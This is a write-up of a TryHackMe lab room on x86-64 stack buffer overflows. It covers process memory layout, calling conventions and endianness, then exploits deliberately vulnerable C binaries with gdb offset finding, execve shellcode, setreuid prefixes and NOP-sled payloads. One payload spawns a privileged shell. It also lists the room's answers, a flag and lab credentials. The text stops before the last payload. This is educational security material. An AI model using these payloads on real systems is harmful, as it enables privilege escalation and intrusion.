TryHackMe-Buffer-Overflows
Buffer Overflows
Learn how to get started with basic Buffer Overflows!
In this room, we aim to explore simple stack buffer overflows(without any mitigation’s) on x86-64 linux programs. We will use radare2 (r2) to examine the memory layout. You are expected to be familiar with x86 and r2 for this room. Check the intro to x86-64 room for any pre-requisite knowledge.
We have included a virtual machine with all the resources to ensure you have the correct environment and tools to follow along. To access the machine via SSH, use the following credentials:
- Username:
user1
- Password:
user1password
[Task 2] Process Layout
When a program runs on a machine, the computer runs the program as a process. Current computer architecture allows multiple processes to be run concurrently(at the same time by a computer). While these processes may appear to run at the same time, the computer actually switches between the processes very quickly and makes it look like they are running at the same time. Switching between processes is called a context switch. Since each process may need different information to run(e.g. The current instruction to execute), the operating system has to keep track of all the information in a process. The memory in the process is organised sequentially and has the following layout:
- User stack contains the information required to run the program. This information would include the current program counter, saved registers and more information(we will go into detail in the next section). The section after the user stack is unused memory and it is used in case the stack grows(downwards)
- Shared library regions are used to either statically/dynamically link libraries that are used by the program
- The heap increases and decreases dynamically depending on whether a program dynamically assigns memory. Notice there is a section that is unassigned above the heap which is used in the event that the size of the heap increases.
- The program code and data stores the program executable and initialised variables.
#1 - Where is dynamically allocated memory stored?
Answer: heap
#2 - Where is information about functions(e.g. local arguments) stored?
Answer: stack
[Task 3] x86-64 Procedures
Stack "Bottom" at Higher Memory Address ┌───────────────────┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ └───────────────────┘ Stack "Top" at Lower Memory Address
A program would usually comprise of multiple functions and there needs to be a way of tracking which function has been called, and which data is passed from one function to another. The stack is a region of contiguous memory addresses and it is used to make it easy to transfer control and data between functions. The top of the stack is at the lowest memory address and the stack grows towards lower memory addresses. The most common operations of the stack are:
- Pushing: used to add data onto the stack
- Popping: used to remove data from the stack
push var
Stack Bottom() ┌───────────────────┐ │ │ │ │ │ │ │ │ └───────────────────┘ Stack Top(memory location 0x8)(rsp point here)
This is the assembly instruction to push a value onto the stack. It does the following:
- Uses var or value stored in memory location of var
- Decrements the stack pointer(known as
rsp
) by 8 - Writes above value to new location of
rsp
, which is now the top of the stack
Stack Bottom() ┌───────────────────┐ │ │ │ │ │ │ ├───────────────────┤ │ var │ └───────────────────┘ Stack Top(memory location 0x0)(rsp point here)
pop var
This is an assembly instruction to read a value and pop it off the stack. It does the following:
Stack Bottom() ┌───────────────────┐ │ │ │ │ │ │ ├───────────────────┤ │ var │ └───────────────────┘ Stack Top(memory location 0x0)(rsp point here)
- Reads the value at the address given by the stack pointer
- Increment the stack pointer by 8
- Store the value that was read from rsp into var
Stack Bottom() ┌───────────────────┐ │ │ │ │ │ │ │ │ │ │ └───────────────────┘ Stack Top(memory location 0x8)(rsp point here)
It’s important to note that the memory does not change when popping values of the stack - it is only the value of the stack pointer that changes!
Each compiled program may include multiple functions, where each function would need to store local variables, arguments passed to the function and more. To make this easy to manage, each function has its own separate stack frame, where each new stack frame is allocated when a function is called, and deallocated when the function is complete.
Stack Bottom() ┌───────────────────┐ │ Stack Frame One │ ├───────────────────┤ │ Stack Frame Two │ ├───────────────────┤ │ Stack Frame Three │ └───────────────────┘ Stack Top(memory location 0x0)(rsp point here)
This is easily explained using an example. Look at the two functions:
int add(int a, int b){
int new = a + b;
return new;
}
int calc(int a, int b){
int final = add(a, b);
return final;
}
calc(4, 5)
#1 - what direction does the stack grown(l for lower/h for higher)
Answer: l
#2 - what instruction is used to add data onto the stack?
Answer: push
[Task 4] Procedures Continued
The explanation assumes that the current point of execution is inside the calc function. In this case calc is known as the caller function and add is known as the callee function. The following presents the assembly code inside the calc function
Stack Bottom ┌───────────────────────────────┐ │ Previous stack frame │ ├───────────────────────────────┤ │ Stack frame for function calc │ └───────────────────────────────┘ Stack Top
The add function is invoked using the call operand in assembly, in this case callq sym.add. The call operand can either take a label as an argument(e.g. A function name), or it can take a memory address as an offset to the location of the start of the function in the form of call *value
. Once the add function is invoked(and after it is completed), the program would need to know what point to continue in the program. To do this, the computer pushes the address of the next instruction onto the stack, in this case the address of the instruction on the line that contains movl %eax, local_4h. After this, the program would allocate a stack frame for the new function, change the current instruction pointer to the first instruction in the function, change the stack pointer(rsp) to the top of the stack, and change the frame pointer(rbp) to point to the start of the new frame.
Stack Bottom ┌───────────────────────────────┐ │ Previous stack frame │ ├───────────────────────────────┤ │ Stack frame for function calc │ ├───────────────────────────────┤ │ Return address (still part of │ │ calc stack frame) │ ├───────────────────────────────┤ │ Stack frame for add │ └───────────────────────────────┘ Stack Top
Once the function is finished executing, it will call the return instruction(retq). This instruction will pop the value of the return address of the stack, deallocate the stack frame for the add function, change the instruction pointer to the value of the return address, change the stack pointer(rsp) to the top of the stack and change the frame pointer(rbp) to the stack frame of calc.
Stack Bottom ┌───────────────────────────────┐ │ Previous stack frame │ ├───────────────────────────────┤ │ Stack frame for calc │ └───────────────────────────────┘ Stack Top
Now that we’ve understood how control is transferred through functions, let’s look at how data is transferred.
In the above example, we save that functions take arguments. The calc function takes 2 arguments(a and b). Upto 6 arguments for functions can be stored in the following registers:
- rdi
- rsi
- rdx
- rcx
- r8
- r9
Note: rax is a special register that stores the return values of the functions(if any).
If a function has anymore arguments, these arguments would be stored on the functions stack frame.
We can now see that a caller function may save values in their registers, but what happens if a callee function also wants to save values in the registers? To ensure the values are not overwritten, the callee values first save the values of the registers on their stack frame, use the registers and then load the values back into the registers. The caller function can also save values on the caller function frame to prevent the values from being overwritten. Here are some rules around which registers are caller and callee saved:
- rax is caller saved
- rdi, rsi, rdx, rcx r8 and r9 are called saved(and they are usually arguments for functions)
- r10, r11 are caller saved
- rbx, r12, r13, r14 are callee saved
- rbp is also callee saved(and can be optionally used as a frame pointer)
- rsp is callee saved
So far, this is a more thorough example of the run time stack:
┌───────────────────────────────┐ │ │ │ │ │ │ │ │ ├───────────────────────────────┤ │ Argument n │ ├───────────────────────────────┤ │ │ │ │ ├───────────────────────────────┤ │ Argument 7 │ ├───────────────────────────────┤ │ Return address │ ├───────────────────────────────┤ │ Saved registers and local var │ └───────────────────────────────┘
#1 - What register stores the return address?
Answer: rax
[Task 5] Endianess
In the above programs, you can see that the binary information is represented in hexadecimal format. Different architectures actually represent the same hexadecimal number in different ways, and this is what is referred to as Endianess. Let’s take the value of 0x12345678 as an example. Here the least significant value is the right most value(78) while the most significant value is the left most value(12).
Little Endian is where the value is arranged from the least significant byte to the most significant byte:
LSB MSB ┌────────────┬────────────┬────────────┬────────────┐ │ 78 │ 56 │ 34 │ 12 │ └────────────┴────────────┴────────────┴────────────┘
Big Endian is where the value is arranged from the most significant byte to the least significant byte.
MSB LSB ┌────────────┬────────────┬────────────┬────────────┐ │ 12 │ 34 │ 56 │ 78 │ └────────────┴────────────┴────────────┴────────────┘
Here, each “value” requires at least a byte to represent, as part of a multi-byte object.
[Task 6] Overwriting Variables
Now that we’ve looked at all the background information, let’s explore how the overflows actually work. If you take a look at the overflow-1 folder, you’ll notice some C code with a binary program. Your goal is to change the value of the integer variable.
int main(int argc, char **argv)
{
volatile int variable = 0;
char buffer[14];
gets(buffer);
if(variable != 0) {
printf("You have changed the value of the variable\n");
} else {
printf("Try again?\n");
}
}
From the C code you can see that the integer variable and character buffer have been allocated next to each other - since memory is allocated in contiguous bytes, you can assume that the integer variable and character buffer are allocated next to each other.
Note: this may not always be the case. With how the compiler and stack are configured, when variables are allocated, they would need to be aligned to particular size boundaries(e.g. 8 bytes, 16 byte) to make it easier for memory allocation/deallocation. So if a 12 byte array is allocated where the stack is aligned for 16 bytes this is what the memory would look like:
┌────────────────────────────────┬─────────────┐ │ buffer │ padding │ └────────────────────────────────┴─────────────┘ 0 12 16
the compiler would automatically add 4 bytes to ensure that the size of the variable aligns with the stack size. From the image of the stack above, we can assume that the stack frame for the main function looks like this:
Stack bottom ┌───────────────────────────────┐ │ Saved registers │ ├───────────────────────────────┤ │ Volatile int variable │ ├───────────────────────────────┤ │ char buffer[13] │ │ . │ │ . │ │ . │ │ buffer[0] │ ├───────────────────────────────┤ │ char **argv │ ├───────────────────────────────┤ │ int argc │ └───────────────────────────────┘ Stack top
even though the stack grows downwards, when data is copied/written into the buffer, it is copied from lower to higher addresess. Depending on how data is entered into the buffer, it means that it’s possible to overwrite the integer variable. From the C code, you can see that the gets function is used to enter data into the buffer from standard input. The gets function is dangerous because it doesn’t really have a length check - This would mean that you can enter more than 14 bytes of data, which would then overwrite the integer variable.
Try run the C program in this folder to overwrite the above variable!
#1 - What is the minimum number of characters needed to overwrite the variable?
Answer: 15
[Task 7] Overwriting Function Pointers
For this example, look at the overflow- 2 folder. Inside this folder, you’ll notice the following C code.
void special()
{
printf("this is the special function\n");
printf("you did this, friend!\n");
}
void normal()
{
printf("this is the normal function\n");
}
void other()
{
printf("why is this here?");
}
int main(int argc, char **argv)
{
volatile int (*new_ptr) () = normal;
char buffer[14];
gets(buffer);
new_ptr();
}
Similar to the example above, data is read into a buffer using the gets function, but the variable above the buffer is not a pointer to a function. A pointer, like its name implies, is used to point to a memory location, and in this case the memory location is that of the normal function. The stack is laid out similar to the example above, but this time you have to find a way of invoking the special function(maybe using the memory address of the function). Try invoke the special function in the program.
Keep in mind that the architecture of this machine is little endian!
#1 - Invoke the special function()
Hint: check the memory address of the function!
[Task 8] Buffer Overflows
For this example, look at overflow-3 folder. Inside this folder, you’ll find the following C code.
#include <stdio.h>
#include <stdlib.h>
void copy_arg(char *string)
{
char buffer[140];
strcpy(buffer, string);
printf("%s\n", buffer);
return 0;
}
int main(int argc, char **argv)
{
printf("Here's a program that echo's out your input\n");
copy_arg(argv[1]);
}
This example will cover some of the more interesting, and useful things you can do with a buffer overflow. In the previous examples, we’ve seen that when a program takes users controlled input, it may not check the length, and thus a malicious user could overwrite values and actually change variables.
In this example, in the copy_arg function we can see that the strcpy function is copying input from a string(which is argv[1] which is a command line argument) to a buffer of length 140 bytes. With the nature of strcpy, it does not check the length of the data being input so here it’s also possible to overflow the buffer - we can do something more malicious here.
Let’s take a look at what the stack will look like for the copy_arg function(this stack excludes the stack frame for the strcpy function):
Stack bottom ┌───────────────────────────────┐ │ Return address │ ├───────────────────────────────┤ │ Saved registers │ ├───────────────────────────────┤ │ char buffer[140] │ │ . │ │ . │ │ . │ │ buffer[0] │ └───────────────────────────────┘ Stack top
Earlier, we saw that when a function(in this case main) calls another function(in this case copy_args), it needs to add the return address on the stack so the callee function(copy_args) knows where to transfer control to once it has finished executing. From the stack above, we know that data will be copied upwards from buffer[0] to buffer[140]. Since we can overflow the buffer, it also follows that we can overflow the return address with our own value. We can control where the function returns and change the flow of execution of a program(very cool, right?)
Know that we know we can control the flow of execution by directing the return address to some memory address, how do we actually do something useful with this. This is where shellcode comes in; shell code quite literally is code that will open up a shell. More specifically, it is binary instructions that can be executed. Since shellcode is just machine code(in the form of binary instructions), you can usually start of by writing a C program to do what you want, compile it into assembly and extract the hex characters(alternatively it would involve writing your own assembly). For now we’ll use this shellcode that opens up a basic shell:
\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05
So why don’t we looking at actually executing this shellcode. The basic idea is that we need to point the overwritten return address to the shellcode, but where do we actually store the shellcode and what actual address do we point it at? Why don’t we store the shellcode in the buffer - because we know the address at the beginning of the buffer, we can just overwrite the return address to point to the start of the buffer. Here’s the general process so far:
- Find out the address of the start of the buffer and the start address of the return address
- Calculate the difference between these addresses so you know how much data to enter to overflow
- Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
Stack bottom ┌────────────────────────────────┐ │ Address of buffer (overwritten │ │ old return address) │ ├────────────────────────────────┤ │ Random data (overwritten saved │ │ registers │ ├────────────────────────────────┤ │ Random data (inside buffer) │ ├────────────────────────────────┤ │ shellcode (inside buffer) │ └────────────────────────────────┘ Stack top
In theory, this looks like it would work quite well. However, memory addresses may not be the same on different systems, even across the same computer when the program is recompiled. So we can make this more flexible using a NOP instruction. A NOP instruction is a no operation instruction - when the system processes this instruction, it does nothing, and carries on execution. A NOP instruction is represented using 90. Putting NOPs as part of the payload means an attacker can jump anywhere in the memory region that includes a NOP and eventually reach the intended instructions. This is what an injection vector would look like:
┌─────────────────┬──────────────────┬──────────────────┐ │ NOP sled │ shell code │ Memory address │ └─────────────────┴──────────────────┴──────────────────┘
You’ve probably noticed that shellcode, memory addresses and NOP sleds are usually in hex code. To make it easy to pass the payload to an input program, you can use python:
python -c “print (NOP * no_of_nops + shellcode + random_data * no_of_random_data + memory address)”
Using this format would be something like this for this challenge:
python -c "print('\x90' * 30 + '\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05' +
'\x41' * 60 +
'\xef\xbe\xad\xde') | ./program_name
"
In some cases you may need to pass xargs before ./program_name.
#1 - Use the above method to open a shell and read the contents of the secret.txt file.
offset
[user1@ip-10-10-93-165 overflow-3]$ gdb -q buffer-overflow (gdb) run $(python -c "print('A'*158)") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('A'*158)") Here's a program that echo's out your input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000414141414141 in ?? () (gdb) run $(python -c "print('A'*159)") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('A'*159)") Here's a program that echo's out your input AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000000000400563 in copy_arg () (gdb)
With a 158 bytes length payload, we are overwritting 6 bytes of the return address. As a result, the offset will be 152 bytes.
shellcode
After many attempts, all failing with an “Illegal instruction” error, I found a shellcode (40 bytes) that works here: https://www.arsouyes.org/blog/2019/54_Shellcode/
>>> shellcode = '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'
>>> len(shellcode)
40
Return address
The last item we need to complete our payload is the return address of the shell code (6 bytes). Our payload will be like this:
┌───────────────────┬────────────────────┬────────────────────┬────────────────────┐ │ NOP sled (90) │ shell code (40) │ random chars (22) │ Memory address (6) │ └───────────────────┴────────────────────┴────────────────────┴────────────────────┘ total length = 90 + 40 + 22 + 6 = 158
>>> payload = '\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + 'B'*6
>>> len(payload)
158
Let’s try that:
(gdb) run $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + 'B'*6)") Starting program: /home/user1/overflow-3/buffer-overflow $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + 'B'*6)") Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64 Here's a program that echo's out your input ������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1�����������������������BBBBBB Program received signal SIGSEGV, Segmentation fault. 0x0000424242424242 in ?? ()
See where NOP sled string is located, and beginning of shellcode.
(gdb) x/100x $rsp-200 0x7fffffffe218: 0x00400450 0x00000000 0xffffe3d0 0x00007fff 0x7fffffffe228: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff 0x7fffffffe238: 0xffffe639 0x00007fff 0x90909090 0x90909090 <--- NOP sled 0x7fffffffe248: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe298: 0x3b6a9090 0xd2314858 0x2f2fb849 0x2f6e6962 <--- shellcode 0x7fffffffe2a8: 0xc1496873 0x504108e8 0x52e78948 0xe6894857 0x7fffffffe2b8: 0x3c6a050f 0xff314858 0x9090050f 0x90909090 0x7fffffffe2c8: 0x90909090 0x90909090 0x90909090 0x90909090 0x7fffffffe2d8: 0x42424242 0x00004242 0xffffe3d8 0x00007fff 0x7fffffffe2e8: 0x00000000 0x00000002 0x004005a0 0x00000000 0x7fffffffe2f8: 0xf7a4302a 0x00007fff 0x00000000 0x00000000 0x7fffffffe308: 0xffffe3d8 0x00007fff 0x00040000 0x00000002 0x7fffffffe318: 0x00400564 0x00000000 0x00000000 0x00000000 0x7fffffffe328: 0xc7dc72b8 0x7f14507a 0x00400450 0x00000000 0x7fffffffe338: 0xffffe3d0 0x00007fff 0x00000000 0x00000000 0x7fffffffe348: 0x00000000 0x00000000 0x0a9c72b8 0x80ebaf05 0x7fffffffe358: 0x935872b8 0x80ebbfb2 0x00000000 0x00000000 0x7fffffffe368: 0x00000000 0x00000000 0x00000000 0x00000000 0x7fffffffe378: 0xffffe3f0 0x00007fff 0xf7ffe130 0x00007fff 0x7fffffffe388: 0xf7de7656 0x00007fff 0x00000000 0x00000000 0x7fffffffe398: 0x00000000 0x00000000 0x00000000 0x00000000
Let’s take any address between the NOP sled and the shellcode (e.g. 0x7fffffffe288
). Here is the final payload:
$ ./buffer-overflow $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + '\x88\xe2\xff\xff\xff\x7f')")
When executed, the programs eventually spawns a shell.
[user1@ip-10-10-12-188 overflow-3]$ ./buffer-overflow $(python -c "print('\x90'*90 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*22 + '\x88\xe2\xff\xff\xff\x7f')") Here's a program that echo's out your input ������������������������������������������������������������������������������������������j;XH1�I�//bin/shI�APH��RWH��j<XH1���������������������������� sh-4.2$ whoami user1 sh-4.2$ cat secret.txt cat: secret.txt: Permission denied sh-4.2$
As you can see above, we are not allowed to access the secret though, because we are not user2.
setreuid
Let’s use pwntools to generate a prefix to our shellcode to run SETREUID:
$ pwn shellcraft -f d amd64.linux.setreuid 1002 \x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05 $ python >>> len('\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05') 14
Our payload now looks like this:
┌───────────────────┬────────────────────┬────────────────────┬────────────────────┬────────────────────┐ │ NOP sled (90) │ setreuid (14) │ shellcode (40) │ random chars (8) │ Memory address (6) │ └───────────────────┴────────────────────┴────────────────────┴────────────────────┴────────────────────┘ total length = 90 + 14 + 40 + 8 + 6 = 158
Let’s test:
[user1@ip-10-10-12-188 overflow-3]$ ./buffer-overflow $(python -c "print('\x90'*90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*8 + '\x88\xe2\xff\xff\xff\x7f')") Here's a program that echo's out your input ������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�������������� sh-4.2$ whoami user2 sh-4.2$ cat secret.txt omgyoudidthissocool!! sh-4.2$
Answer: omgyoudidthissocool!!
[Task 9] Buffer Overflow 2
Look at the overflow-4 folder. Try to use your newly learnt buffer overflow techniques for this binary file.
#1 - Use the same method to read the contents of the secret file!
Code
Below is the code for buffer-overflow-2.c
:
#include <stdio.h>
#include <stdlib.h>
void concat_arg(char *string)
{
char buffer[154] = "doggo";
strcat(buffer, string);
printf("new word is %s\n", buffer);
return 0;
}
int main(int argc, char **argv)
{
concat_arg(argv[1]);
}
Run:
[user1@ip-10-10-12-188 overflow-4]$ ./buffer-overflow-2 OOPS new word is doggoOOPS
offset
The buffer is 154 bytes, but the string doggo
(5 characters) is added. So we should begin to test from 154-5. Let’s start with 8 more bytes:
(gdb) run $(python -c "print('A'*(154-5+8))") Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A'*(154-5+8))") new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x00000000004005d3 in main ()
Not enough to overwrite the return address. Let’s add 8 more bytes:
(gdb) run $(python -c "print('A'*(154-5+8*2))") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A'*(154-5+8*2))") new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000000000004141 in ?? ()
Good, we start seing 2 times ‘A’ overwritting the return address. We need 6 in total, so we need 4 more:
(gdb) run $(python -c "print('A'*(154-5+8*2+4))") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A'*(154-5+8*2+4))") new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x0000414141414141 in ?? ()
The offset is 169 (154-5+8*2+4
).
Shellcode
We’ll use the same shellcode (158 bytes) as previously, with the SETREUID. This time, we need to target user3 (ID is 1003), to be able to read secret.txt
:
[user1@ip-10-10-189-18 overflow-4]$ ll
total 20
-rwsr-xr-x 1 user3 user3 8272 Sep 3 2019 buffer-overflow-2
-rw-rw-r-- 1 user1 user1 250 Sep 3 2019 buffer-overflow-2.c
-rw------- 1 user3 user3 17 Sep 2 2019 secret.txt
[user1@ip-10-10-189-18 overflow-4]$ grep user3 /etc/passwd
user3:x:1003:1003::/home/user3:/bin/bash
Let’s generate the prefix for our shellcode: Sebastien.damaye (talk) $ pwn shellcraft -f d amd64.linux.setreuid 1003 3166036a715848890f05 $ python >>> len(‘3166036a715848890f05’) 14 Sebastien.damaye (talk)
>>> shellcode = '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'
>>> len(shellcode)
40
Return address
Now, let’s have a look at our payload. It should look like this:
┌───────────────────┬────────────────────┬────────────────────┬────────────────────┐ │ NOP sled (90) │ shellcode (54) │ random chars (19) │ Memory address (6) │ └───────────────────┴────────────────────┴────────────────────┴────────────────────┘ total length = 90 + 54 + 19 + 6 = 169
>>> payload = 'A'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B'*19 + 'C'*6
>>> len(payload)
169
Let’s debug:
$ gdb -q buffer-overflow-2 Reading symbols from buffer-overflow-2...(no debugging symbols found)...done. (gdb) run $(python -c "print('A'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B'*19 + 'C'*6)") Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B'*19 + 'C'*6)") Missing separate debuginfos, use: debuginfo-install glibc-2.26-32.amzn2.0.1.x86_64 new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�BBBBBBBBBBBBBBBBBBBCCCCCC Program received signal SIGSEGV, Segmentation fault. 0x0000434343434343 in ?? () (gdb) x/100x $rsp-200 0x7fffffffe208: 0x004005a9 0x00000000 0xf7ffa268 0x00007fff 0x7fffffffe218: 0xffffe62c 0x00007fff 0x67676f64 0x4141416f 0x7fffffffe228: 0x41414141 0x41414141 0x41414141 0x41414141 <--- will be our NOP sled (currently 'A') 0x7fffffffe238: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fffffffe248: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141 0x7fffffffe278: 0x41414141 0x31414141 0xebbf66ff 0x58716a03 <--- shellcode 0x7fffffffe288: 0x0ffe8948 0x583b6a05 0x49d23148 0x622f2fb8 0x7fffffffe298: 0x732f6e69 0xe8c14968 0x48504108 0x5752e789 0x7fffffffe2a8: 0x0fe68948 0x583c6a05 0x0fff3148 0x42424205 0x7fffffffe2b8: 0x42424242 0x42424242 0x42424242 0x42424242 <--- random chars 0x7fffffffe2c8: 0x43434343 0x00004343 0xffffe3c8 0x00007fff <--- return address 0x7fffffffe2d8: 0x00000000 0x00000002 0x004005e0 0x00000000 0x7fffffffe2e8: 0xf7a4302a 0x00007fff 0x00000000 0x00000000 0x7fffffffe2f8: 0xffffe3c8 0x00007fff 0x00040000 0x00000002 0x7fffffffe308: 0x004005ac 0x00000000 0x00000000 0x00000000 0x7fffffffe318: 0xb5081d5d 0x166c42e5 0x00400450 0x00000000 0x7fffffffe328: 0xffffe3c0 0x00007fff 0x00000000 0x00000000 0x7fffffffe338: 0x00000000 0x00000000 0x7b281d5d 0xe993bd9a 0x7fffffffe348: 0xe10c1d5d 0xe993ad2d 0x00000000 0x00000000 0x7fffffffe358: 0x00000000 0x00000000 0x00000000 0x00000000 0x7fffffffe368: 0xffffe3e0 0x00007fff 0xf7ffe130 0x00007fff 0x7fffffffe378: 0xf7de7656 0x00007fff 0x00000000 0x00000000 0x7fffffffe388: 0x00000000 0x00000000 0x00000000 0x00000000
Let’s take 0x7fffffffe268
as return address (between future NOP sled and beginning of shell code).
Payload
Now, our payload is ready:
